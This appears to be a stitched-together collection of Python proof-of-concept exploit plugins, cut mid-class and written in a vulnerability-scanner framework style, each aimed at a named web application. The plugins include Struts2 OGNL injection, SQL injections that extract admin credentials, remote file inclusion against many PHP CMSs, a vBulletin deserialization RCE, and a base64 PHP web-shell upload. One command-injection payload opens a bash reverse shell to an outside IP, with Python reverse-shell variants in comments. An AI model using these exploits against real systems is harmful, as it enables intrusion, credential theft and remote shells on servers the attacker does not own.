appName = 'struts' appVersion = 'struts' appPowerLink = 'struts' samples = [''] def _attack(self): '''attack mode''' return self._verify() def _verify(self): '''verify mode''' result = {} self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}" resp = req.post(self.url,headers = self.headers) if resp and resp.text and resp.status_code == 200: if "bey0nd" in resp.text: result['FileInfo'] = {} result['FileInfo']['Filename'] = "bey0nd" return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Failed') return output register(Struts45POC)
result = {} url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address') vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1') payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a" values = list() values.append("form_submit=ok&id=&true_name[]=") values.append(payload) values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123") post_data = "".join(values) headers = {"Content-Type": "application/x-www-form-urlencoded"} req.post(vul_url, data=post_data, headers=headers) res = req.get(url) if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = payload return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(ShopNCPOC)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/eventcal/mod_eventcal.php?lm_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Limbo_CMS_Module_event_Remote_File_Include)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Joomla_Kochsuite_Component_Remote_File_Include)
phpinfo can be via. that will be leak server's information. ''' # the sample sites for examine samples = [''] def _attack(self): response = req.get(self.url, headers={"referer": self.url}, timeout=10) return self.parse_attack(response) def _verify(self): result = {} head = { 'referer':self.url } respon = req.get(self.url, headers=head, timeout=10) if respon.status_code == 200 and 'PHP Version' in respon.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet Nothing returned') return output register(PhpinfoPOC)
if match_result: result['AdminInfo'] = {} result['AdminInfo']['Username'] = match_result[0][1:] result['AdminInfo']['Password'] = match_result[1][1:] return self.parse_attack(result) def _verify(self): result = {} vul_url = urlparse.urljoin(self.url, '/akcms_keyword.php?sid=11111') payload = "'md5(0x2333333),1,1,1) -- a" headers = {"Content-Type": "application/x-www-form-urlencoded"} res = req.get(vul_url.join(payload)) if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = payload return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(ShopNCPOC)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(McNews_Remote_File_Include)
def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/code/error.php?path_prefix=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(GrayCMS_Remote_File_Include)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Insky_CMS_Remote_File_Include)
def _attack(self): result = {} sessionid = self.common() if sessionid: token = hashlib.new('md5', randomStr()).hexdigest() payload = '<script>alert("%s")</script>' % token req.get(self.url + "/escform.esp?sessionid=" + sessionid + "&formid=131&opmsg=" + payload).content response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=257").content if token in response: result['VerifyInfo'] = {} result['XSSInfo'] = {} result['VerifyInfo']['URL'] = self.url result['XSSInfo']['Payload'] = payload response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=259").content #ɾ³ýÏûÏ¢ response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=11").content #Í˳öµÇ¼ return self.parse_result(result) def parse_result(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(ESC_Data_Controller_Privilege_Escalation)
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(" "floor(rand(0)*2),(select md5(233)))a from " "information_schema.tables group by a)b)," "'','','','1','127.0.0.1','2') #" } # 使用 requests 发送 post 请求 response = req.post(target, data=post_data, timeout=10) content = response.content # 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值 if 'e165421110ba03099a1c0393373c5b43' in content: result = {'VerifyInfo': {}} result['VerifyInfo']['URL'] = target return self.parse_result(result) def _attack(self): return self._verify() def parse_result(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet Nothing returned') return output register(CmsEasyPoC)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/portfolio/msg/view.php?av=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Cyberfolio_Remote_File_Include)
"1',(SELECT 1 FROM (select count(*),concat(" "floor(rand(0)*2),(select md5(233)))a from " "information_schema.tables group by a)b)," "'','','','1','127.0.0.1','2') #" } # 使用 requests 发送 post 请求 response = req.post(target, data=post_data, timeout=10) content = response.content # 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值 if 'e165421110ba03099a1c0393373c5b43' in content: result = {'VerifyInfo': {}} result['VerifyInfo']['URL'] = target return self.parse_result(result) def _attack(self): return self._verify() def parse_result(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet Nothing returned') return output register(CmsEasyPoC)
img_url = self.upload_image() payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23' sess = req.Session() sess.headers.update(self.headers) sess.get(img_url.replace('300x300', payload)) #get shell resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content if 'cfsqingfd' in resp: result['ShellInfo'] = {} result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url result['ShellInfo']['Content'] = 'e' return self.parse_attack(result) def _verify(self): return self._attack() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(TestPOC)
award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>' , raw[amount_of_raws]).group(1) total = total + 1 print '\n' print str(total) + '.' print author print time print type print vid print title print award print '\n' result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url print 'total:' , total return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(showSeebugSubmission)
vulType = 'Database Found' desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。' samples = ['http://burdurdaemlak.com'] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/veribaze/angelo.mdb' % self.url response = req.get(vul_url).content if re.search('Standard Jet DB', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Angelo_emlak_Database_Found)
def _verify(self): '''verify mode''' result = {} import socket s = socket.socket() payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' socket.setdefaulttimeout(5) host = url2ip(self.url) port = 6379 s.connect((host, port)) s.send(payload) recvdata = s.recv(1024) if recvdata and 'redis_version' in recvdata: result['FileInfo'] = {} result['FileInfo']['Filename'] = "redis-unauth" s.close() return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Failed') return output register(RedisunauthPOC)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/pop.php?base=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(MyABraCaDaWeb_Remote_File_Include)
def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(AlstraSoft_EPay_Pro_Remote_File_Include)
vulType = 'Remote File Inclusion' desc = 'phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/index.php?section=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(JASmine_News_Remote_File_Include)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://tool.scanv.com/wsl/php_verify.txt?]' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(interact_Remote_File_Include)
appPowerLink = 'axublog' samples = [''] def _attack(self): '''attack mode''' return self._verify() def _verify(self): '''verify mode''' result = {} payurl = "hit.php?g=arthit&id=-1 +%55NION+ALL+%53ELECT+1,2,3,4,5,6,md5(1),8,9,10,11,12 from axublog_adusers" resp = req.get(self.url + payurl) print resp.text if resp and resp.text and resp.status_code == 200: if "c4ca4238a0b923820dcc509a6f75849b" in resp.text: result['AdminInfo'] = {} result['AdminInfo'][ 'Password'] = "******" return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Failed') return output register(AxublogPOC)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(dotWidget_CMS_Remote_File_Include)
resp1 = req.post(shell_url, data=verify_payload) if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content: result['shellURL'] = shell_url + " password: a" return self.parse_attack(result) return self.parse_attack(result) def _verify(self): result = {} payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A13%3A%22print+md5%281%29%3B%22%3B%7D" vulurl = urlparse.urljoin( self.url, '/ajax/api/hook/decodeArguments?arguments=%s' % payload) print vulurl resp = req.get(vulurl) if resp.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in resp.content: result["VerifyInfo"] = {} result["VerifyInfo"]['URL'] = vulurl result["VerifyInfo"]["Payload"] = payload return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("Internet nothing returned") return output register(vB5_RCE)
class EduwindPOC(POCBase): vulID = '90650' # ssvid version = '1' author = ['Dubuqingfeng'] vulDate = '2016-01-13' createDate = '2016-02-03' updateDate = '2016-02-03' references = ['http://www.sebug.net/vuldb/ssvid-90650'] name = '_90650_shopnc_2008_place_sql_inj_PoC' appPowerLink = 'http://www.phpcms.cn' appName = 'Eduwind' appVersion = '2008' vulType = 'SQL Injection' desc = ''' phpcms 2008 中广告模块,存在参数过滤不严, 导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用, 如果关闭了错误显示,可以采用基于时间和错误的盲注 ''' samples = ['http://10.1.200.28/'] @require_header('cookie') def _attack(self): result = {} url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address') vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1') payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a" values = list() values.append("form_submit=ok&id=&true_name[]=") values.append(payload) values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123") post_data = "".join(values) headers = {"Content-Type": "application/x-www-form-urlencoded"} req.post(vul_url, data=post_data, headers=headers) res = req.get(url) if res.status_code == 200: match_result = re.findall(r'~\w*', res.content, re.I | re.M) if match_result: result['AdminInfo'] = {} result['AdminInfo']['Username'] = match_result[0][1:] result['AdminInfo']['Password'] = match_result[1][1:] return self.parse_attack(result) @require_header('cookie') def _verify(self): result = {} # 定义地址 vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic') logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout') login_url = urlparse.urljoin(self.url, '/index.php?r=u/login') admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site') # 提升管理员权限Payload payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0=" headers = {"Content-Type": "application/x-www-form-urlencoded"} email = raw_input("Email: ") password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>') if find_result != -1: # 获取cookie cookies = admin_result.cookies # 发送post请求 get_shell_result = req.post(admin_url, cookies=cookies, headers=headers) print cookies print get_shell_result.content print get_shell_result.cookies result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Postdata'] = payload return self.parse_attack(result) def do_login(self): def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(EduwindPOC)
payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'} response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) # 方法二 new bash Code # payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'} # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) # 方法三 Python Shell 貌似这方法只适合手动跑 # payload = { # 'ip' : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&', # 'Submit': 'Submit'} # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) result['extra'] = {} result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' " return self.parse_output(result) def _attack( self ): return self._verify() def parse_output( self, result ): output = Output(self) if result: output.success(result) else: output.fail('Error') return output register(TestPoc)
Content-Length: 171 Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36; Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 --1c88e9afa73c438d93b5043a7096b207 Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b" Content-Type: text/plain --1c88e9afa73c438d93b5043a7096b207-- """.format(uri=uri, randint1=str(randint1)) code, head, html, redir, log = curl.http(arg, raw=raw) # print head if code != 0 and "X-Test-%s" % str(randint1) in head: return True else: return False def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Failed') return output register(Struts46POC)
if data != None: result = {'VerifyInfo': {}} result['VerifyInfo']['URL'] = self.url return self.parse_result(result) def _attack(self): result = {} target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294" response = req.get(target) content = response.content regex = re.compile('<h2>.*?\|(.*?)</h2>') data = regex.search(content) if data != None: string = data.groups() result = {'VerifyInfo': {}} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['data'] = string return self.parse_result(result) def parse_result(self, result): output = Output(self) if result: output.success(result) else: output.fail("Internet Nothing returned") return output register(Fuckdede)
All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk. ''' samples = [''] def _attack(self): return self._verify() def _verify(self, verify=True): result = {} vul_url = '%s/api/wlan/security-settings' % (self.url) response = req.get(vul_url).content if re.search('<WifiWpapsk>', response) and re.search('<WifiWpaencryptionmodes>', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Huawei_E5331_Unauthorized_access)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Mambo_cropimage_Component_Remote_File_Include)
def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/includes/tgpinc.php?DOCUMENT_ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(GnatTGP_Remote_File_Include)
result = {} target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a" response = req.get(target) content = response.content if 'DedeCMS Error Warning!' in content: result = {'VerifyInfo':{}} result['VerifyInfo']['URL'] = self.url return self.parse_result(result) def _attack(self): return self._verify() def parse_result(self, result): output = Output(self) if result: output.success(result) else: output.fail("Internet Nothing returned") return output register(Fuckdede)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/genpage-cgi.php?REP_INC=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(Hitweb_Remote_File_Include)
parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$' #发送请求 resp = req.get(url=vulurl, headers=httphead, timeout=80) #检查是否含有特征字符串 if '$~~~$' in resp.content: #提取信息 match = re.search(parttern, resp.content, re.M | re.I) if match: #漏洞利用成功 result['DbInfo'] = {} #数据库用户名 result['DbInfo']['Username'] = match.group(1) #数据库版本 result['DbInfo']['Version'] = match.group(2) return self.parse_output(result) def _verify(self): return self._attack() def parse_output(self, result): #parse output output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(TestPOC)
vulType = 'Remote File Inclusion' desc = '' samples = [''] def _attack(self): return self._verify() def _verify(self): result = {} vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url response = req.get(vul_url).content if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_attack(result) def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('failed') return output register(FlatNuke_Remote_File_Include)